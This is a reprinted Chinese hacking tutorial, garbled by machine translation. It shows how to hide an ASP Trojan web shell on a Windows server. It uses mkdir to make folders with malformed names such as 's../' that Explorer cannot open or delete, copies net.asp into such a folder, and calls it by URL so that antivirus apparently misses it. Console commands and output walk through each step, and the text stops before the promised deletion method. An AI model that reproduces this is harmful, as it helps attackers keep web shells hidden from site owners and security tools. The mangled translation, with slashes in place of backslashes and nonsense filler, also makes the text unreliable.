Reprinted: 〓 〓 冰 〓 〓 [[[.... 非 非 非 非 非 非 非 非 非 非 非 非 非 非 非 非]
You have to say that it is a modification of the ASP Trojan's code or encryption, etc. to escape the anti-virus, wrong, this doesn't need you to modify, and no one guarantees that the ASP you modified will not be killed by the XX anti-virus software. Anyway, I am too lazy, huh, we Run CMD, CD C: / Winnt / System32 / MyHome is also available. That is, the address of your virtual directory turned, first talks. Everyone knows that "/" symbol in Windows is the separation symbol of the path, such as "c: / windows /" means the Windows folder in the C partition, "c: /windows/system.exe" means C partition The system.exe file in the Windows folder, so that we will keep us:
What if there is a "/" symbol in the file name? If "S /" is the name of a folder, this folder is located in: "f: /", his path is "f: / s /", when we try to access, Windows will be wrong, think we have to open. The file is the s folder of the F partition so that Windows cannot open and will return an error because the above path does not exist.
Maybe you are trying to create a "S /" file now, but Windows will prompt you: "/" The symbol is not the name of the file, the folder. It seems that Windows still thinks this. OK We continue, do not believe that files containing "/" symbols cannot be established.
Now open your computer, we have to do some very interesting attempts. After entering Windows, click: Start> Run and enter "CMD" and the car (if you are win98, enter "command"), then you will see Windows command console, we just want to use it to complete our remaining test The following contains a lot of characters in {} are my comment:
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C: / WinNT / System32 / MyHome> Mkdir s / {Our first attempt, the result of Windows only creates S folder "/ "Ignore 忽}} c: / winnt / system32 / myHome> MKDIR S / S1 / {still failed, Windows first created a S folder, then create S1 folder} C: / Winnt / System32 / MyHome> Mkdir s. / {"s. /" is parsed to S "./" is also ignored} subdirectories or files s. / already exists. C: / Winnt / System32 / MyHome> Mkdir s ../ {Finally, now you can see "s." in the Explorer, but you can't open / delete} C: / Winnt / System32 / MyHome> Mkdir S ... / {successful, can blow in the resource browser? S .. "You can open but you can't delete}
Why is this this? Let's talk about this "S." folder you see. He can't open it, you can't delete it, can't open because his actual path is "C: / Winnt / System32 / myHome / s ../" (ourselves So you can determine his actual path) But the name in Windows Explorer becomes "S." That is to say, when you try to open it, Windows actually tries to open "C: / Winnt / System32 / MyHome / s. / "Of course, you can't open it, the file does not exist, so Windows will report an error. Can't delete because of this, Windows parses an actually existing file path to a non-existing path, and the XX action cannot be done. This file is said, this file can be opened, but it can't be deleted. Wait ... Open? Do you think that Windows really opens the "s ... /" file we created? You will understand the following test. Or is the old rule {} is my annotation convenient to understand:
---------------------------------------------- Microsoft Windows XP [ Version 5.1.2600] (c) Copyright 1985-2001 Microsoft Corp. C: / Winnt / System32 / MyHome> Copy Net.asp s ../ {Copy the Trojan file just your ASP to "s ../", The resource manager's "S."} has copied 1 file. C: / Winnt / System32 / MyHome>
Now return to your resource manager to open the "S." folder, what did you see? How will "net.asp" file here? We just replicated to "S."? Isn't we open "S." folder actually open "s"? Nice fact is like this. In fact, if you create a "S" folder "S." to open, but actually open "S".
This is a key topic. In fact, we use the S. directory that is not killed to hide our Trojan, regardless of the Trojan to poison, but the general exe file cannot be running in S. Such a directory, but ASP Trojans can! You can perform the CMD command by browsing, copy net.asp to s. Directory, delete net.asp, we are in browser
http://127.0.0.1/kiss/kiss/s../net.asp can see the viewed ASP Trojan is here. Generally, users can't find him, even if the professional anti-virus software will only go to kill. " S "and skip" s ../ ", let's talk about the delete method.
Microsoft Windows XP [Version 5.1.2600] (c) Copyright 1985-2001 Microsoft Corp. f: / test> DIR drive f is the serial number of the BGTING volume is 2C8E-FE1C F: / TEST directory 2003-09 -11 17:50
